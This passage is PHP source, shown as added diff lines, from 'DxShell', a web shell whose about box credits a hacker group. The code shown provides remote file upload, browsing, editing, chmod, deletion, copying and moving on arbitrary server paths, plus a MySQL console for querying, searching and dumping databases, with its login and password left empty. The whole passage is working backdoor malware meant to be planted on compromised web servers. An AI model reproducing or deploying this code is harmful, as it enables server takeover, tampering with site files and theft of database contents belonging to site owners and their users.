($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)' ).');'; + print "\n".'fclose($f);'; + print "\n".'//Yahoo, hacker, the file is here =)'; + print "\n".'?>'; + print "\n".'</textarea>'; + die(); + } + +?> + +<table align=center> + <tr><td class=mode_header> + @MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?> + </td></tr></table> +<? + +######## +######## AboutBox +######## +if ($_GET['dxmode']=='WTF') + { + ?> +<table align=center class=nooooneblya><tr><td><div align=center> +<?php +print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>'; +print '<br>o_O Tync, ICQ# 1227-700'; +?><br><br> +<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table> +<SCRIPT language=Javascript><!-- +var tl=new Array( +"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?", +"What's wrong with other shells?", +"Usability, functionality, bugs?... NO.", +"The main bug is: these shells ARE NOT mine =)", +"Just like to be responsible for every motherfucking byte of code.", +"Enjoy!", +"-----------------------------------", +"o_O Tync, http://hellknights.void.ru/, ICQ# 1227-700", +"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>", +"", +"Greetz to: ", +"iNfantry the Ruler", +"Nik8 the Hekker", +"_1nf3ct0r_ the Father", +"Industry of Death the betatest0r =)", +"", +"Thanks to:", +"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music", +"", +"Wartime testers & debuggers ::: =))) :::", +"MINDGROW", +"BELLFAGOR", +"", +"", +"Hekk da pl0net!", +"--- EOF ---" +); +var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row; +function type_text() +{contents='';row=Math.max(0,index-50); +while(row<index) contents += tl[row++] + '\r\n'; +document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|'; +if(text_pos++==str_length) + {text_pos=0;index++; + if(index!=tl.length) + {str_length=tl[index].length;setTimeout("type_text()",1000); + } + } else setTimeout("type_text()",speed); +}type_text(); +//--> +</SCRIPT> + <?php + } + + + ################################### + +######## +######## Upload file +######## +if ($_GET['dxmode']=='UPL') + { + if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted')); + + if (isset($_FILES['dx_uplfile']['tmp_name'])) + { + $GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']); + DxFiles_UploadHere($_POST['dxdir'], $_FILES['dx_uplfile']['name'], $GETFILE); + } + else + { + print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>'; + print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">'; + print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>'; + print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>'; + print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>'; + print "\n".'<input type=submit value="Upload" class="submit"></form>'; + } + } + + ################################### + +######## +######## Directory listings +######## +if ($_GET['dxmode']=='DIR') + { + if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']); + $_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']); + if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/'; + + print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">'; + DxGETinForm('leave', 'dxmode'); + print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>'; + print "\n".'<input type=submit value="Goto" class="submit"></form>'; + + print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>'; + if (!file_exists($_GET['dxdir'])) die(DxError('No such directory')); + if (!is_dir($_GET['dxdir'])) die(DxError('It\'s a file!! What do you think about listing files in a file? =)) ')); + + if (isset($_GET['dxparam'])) + { if ($_GET['dxparam']=='mkDIR') if ( !mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3)) ) DxError('Unable to mkDir. Perms?'); + if ($_GET['dxparam']=='mkFILE') if ( !touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3)) ) DxError('Unable to mkFile. Perms?'); + } + + if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...')); + $FILES=array('DIRS' => array(), 'FILES' => array()); + while (!is_bool( $file = readdir($dir_ptr) ) ) + if (($file!='.') and ($file!='..')) if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file; + asort($FILES['DIRS']);asort($FILES['FILES']); + + print "\n".'<span style="position:absolute;right:0pt;">'; + if (isset($_GET['dxdirsimple'])) print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>'; + else print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>'; + print '</span>'; + + $folderup_link=explode('/',$_GET['dxdir'].'../'); + if (!empty($folderup_link[ count($folderup_link)-3 ]) AND ($folderup_link[ count($folderup_link)-3 ]!='..')) + unset($folderup_link[ count($folderup_link)-3 ], $folderup_link[ count($folderup_link)-1 ]); + $folderup_link=implode('/', $folderup_link); + print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>' + .DxImg('foldup').' ../</a>'; + + print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>' + .'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>' + .' / ' + .'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>' + .' / '.str_repeat('&nbsp;',5) + .'<font class=highlight_txt>UPLOAD: </font>' + .'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>' + .' / ' + .'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>' + ; + + print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files '; + print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">'; + for ($NOWi=0;$NOWi<=1;$NOWi++) + for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++) + { $cur=&$FILES[$NOW][$i]; + $dircur=$_GET['dxdir'].$cur; + print "\n".'<tr>'; + print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>' + .(($NOW=='DIRS')?DxImg('folder').' ' + . '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'') + .(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'') + .htmlspecialchars($cur).'</td>'; + + if (!isset($_GET['dxdirsimple'])) + { + print "\n\t".'<td class=linelisting>' + .'<span '.DxDesign_DrawBubbleBox('File Info', '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>' + .'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>' + .'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur)) + , 150).' class=Hover><b>INFO</span> </td>'; + print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>' + .((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'') + .'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>'; + } + + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>'; + + if (!isset($_GET['dxdirsimple'])) + { + if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>'; + if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>'; + print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>'; + print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>'; + } + print "\n\t".'</tr>'; + } + print "\n".'</table>'; + } + + +######## +######## File Global Actions +######## +if ('F_'==substr($_GET['dxmode'],0,2)) + { if (empty($_GET['dxfile'])) + { print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', ''); + print "\n".'<input type=text name="dxfile" value="" style="width:70%;">'; + print "\n".'<br><input type=submit value="Select" class="submit">'; + print "\n".'</form>'; + } + if (!file_exists(@$_GET['dxfile'])) die(DxError('No such file')); + print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>'; + } + +######## +######## File CHMOD +######## +if ($_GET['dxmode']=='F_CHM') + { + if (isset($_GET['dxparam'])) + { if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE) + print DxError('Chmod "'.$_GET['dxfile'].'" failed'); + else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>'; + } + else + { print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxfile'); + print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )'; + print "\n".'<br><input type=text name="dxparam" value="'. + //decoct(fileperms($_GET['dxfile'])) + substr(sprintf('%o', fileperms($_GET['dxfile'])), -4) + .'">'; + print "\n".'<input type=submit value="chmod" class="submit"></form>'; + } + } + +######## +######## File View +######## +if ($_GET['dxmode']=='F_VIEW') + { + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + if (!is_readable($_GET['dxfile'])) die(DxError('File is not readable. Perms?...')); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>'; + print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>'; + print "\n".'<td>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>' + .'</td>'; + print "\n".'</tr></table><br>'; + print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file'; + + print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n"; + print "\n".'<plaintext>'; + print file_get_contents($_GET['dxfile']); + die(); /* Plaintext is infinite */ + } + +######## +######## File Edit +######## +if ($_GET['dxmode']=='F_ED') + { + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + if (isset($_POST['dxparam'])) + { if (!is_writable($_GET['dxfile'])) die(DxError('File is not writable. Perms?...')); + if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed')); + if (fputs($f, $_POST['dxparam'])===FALSE) die(DxError('I/O: File write failed')); + fclose($f); + print 'File saved OK;'; + } + else + { + if (!is_readable($_GET['dxfile'])) die(DxError('File is not readable. Perms?...')); + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>'; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>'; + print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>'; + print "\n".'</form>'; + } + } + +######## +######## File Delete +######## +if ($_GET['dxmode']=='F_DEL') + { if (isset($_GET['dx_ok'])) + { if ($_GET['dx_ok']=='Yes') + { if ( (is_file($_GET['dxfile']) AND !unlink($_GET['dxfile'])) OR (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile'])) ) + print DxError('Unable to delete file. Perms?...<br>'); + else + { print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + } + else + { + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxfile'); + print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>' + ."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?' + ."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>' + ."\n".'</td></tr></table>'; + print "\n".'</form>'; + } + } + +######## +######## File Rename +######## +if ($_GET['dxmode']=='F_REN') + { + if (isset($_POST['dxparam'])) + { + if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam'])) + print DxError('Unable to rename. Perms?...<br>'); + else + { + print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + else + { + print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>'; + print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">'; + print "\n".'<input type=submit value="Rename" class="submit"></form>'; + } + } + +######## +######## File Copy +######## +if ($_GET['dxmode']=='F_COP') + { + if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))')); + + $newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3); + if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */ + $newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos); + print $newname; + if (!copy($_GET['dxfile'], $newname)) + print DxError('Unable to copy. Perms?...<br>'); + else + { + print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + $GLOB['SHELL']['USER']['Login']=''; + $GLOB['SHELL']['USER']['Passw']=''; /* pwd. "as is", or md5() possible */ +######## +######## File Move +######## +if ($_GET['dxmode']=='F_MOV') + { + if (isset($_POST['dxparam'])) + { + if (!rename($_GET['dxfile'], $_POST['dxparam'])) + print DxError('Unable to rename. Perms? Or no path?...<br>'); + else + { + print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam']))); + } + } + else + { + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); + print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>'; + print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">'; + print "\n".'<input type=submit value="M0ve" class="submit"></form>'; + } + } + +if (substr($_GET['dxmode'],0,2)=='F_') + {/* file actions */ + print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>'; + } + + ################################### + +######## +######## SQL Maintenance +######## +if ($_GET['dxmode']=='SQL') + { if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'])) + { print "\n".'<h2>MySQL connection</h2>'; + print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>'; + DxGETinForm('leave', 'dxmode'); + print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">'; + print "\n".'<br>Login:<input type=text name="dxsql_l" value="" style="width:200pt">'; + print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" style="width:200pt">'; + print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>'; + die(); + } + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + $mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()")); + print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true); + for ($i=0;$i<count($DATABASES);$i++) + $DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false)); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0>' + .'<tr><td class=h2_oneline><h1>DB:</h1></td>'; + if (!isset($_GET['dxsql_d'])) + { + print "\n".'<td class=h2_oneline style="border-width:0pt;">'; + print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p'); + print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">'; + print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>'; + for ($i=0;$i<count($DATABASES);$i++) + print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">' + .'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0] + .'</OPTION>'; + print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>'; + print "\n".'</tr></table>'; + die(); + } + else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>' + .'</tr></table>'; + + if (!empty($_GET['dxsql_d'])) + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + if (!empty($_GET['dxsql_d'])) + { + print "\n\t".'<table border=0 cellspacing=0 cellpadding=0>'; + print "\n\t".'<caption>Tables:</caption>'; + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>'; + } + print "\n\t".'</table>'; + } + print "\n".'</td><td width=100%>'; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;'; + print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit value="Query" class="submit"> ' + .'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>' + .'<br>'; + + if (empty($_POST['dxsql_q'])) die('</td></tr></table>'); + $_POST['dxsql_q']=explode(';', $_POST['dxsql_q']); + + foreach ($_POST['dxsql_q'] as $CUR_Q) + { if (empty($CUR_Q)) continue; + $CUR_Q.=';'; + + $num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false); + if ($num<=0) continue; + + print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>'; + + $INDEXES=array_keys($FETCHED[0]); + print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>'; + print "\n\t".'<tr><td class="listing"><div align=center class="highlight_txt">###</td>'; + foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>'; + print '</tr>'; + + for ($l=0;$l<count($FETCHED);$l++) + { + print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>'; + for ($i=0; $i<count($INDEXES); $i++) + print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>'; + } + + print "\n".'</table><br>'; + } + print "\n".'</td></tr></table>'; + } + +######## +######## SQL Search +######## +if ($_GET['dxmode']=='SQLS') + { + if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d'])) die(DxError('SQL server/login/password/database are not set')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>'; + print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + + if (isset($_POST['dxsqlsearch']['txt'])) + if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']); + + print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>'; + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); + if ($TRowCnt[0][0]>0) + print "\n\t".'<OPTION value="'.$TABLES[$i].'" ' + .( (isset($_POST['dxsqlsearch']['tables']))? ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'') :'SELECTED' ).'>' + .$TABLES[$i].'</OPTION>'; + } + print "\n\t".'</SELECT>'; + print "\n".'</td><td width=100%>'; + print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">'; + print "\n".'<br>'; + foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad) + print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" ' + .( (isset($_POST['dxsqlsearch']['mode']))? (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'') :(($cur_rad=='Any')?'CHECKED':'') ) + .' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;'; + print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>'; + print "\n".'</form>'; + + if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>'); + + if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected')); + + if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt'])); + else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']); + + + $GLOBALFOUND=0; + foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE) + { $Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE '; + $Q_ARR=array(); + DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true); for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0]; + foreach ($COLS as $CUR_COL) + { if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact'))) + { for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++) + $Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"'; + } + else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0]; + + if ($_POST['dxsqlsearch']['mode']=='each') + { $Q_ARR_EXACT[]=implode(' AND ', $Q_ARR); + $Q_ARR=array(); + } + } + if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';'; + if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );'; + if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );'; + + /* $Q is ready */ + + if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0) + { + $GLOBALFOUND+=$num; print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>'; + print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>'; + for ($l=0;$l<count($FETCHED);$l++) + { + print "\n\t".'<tr>'; + for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>'; + print '</tr>'; + } + print "\n".'</table><br>'; + } + } + print "\n".'<br>Total: '.$GLOBALFOUND.' matches'; + + print 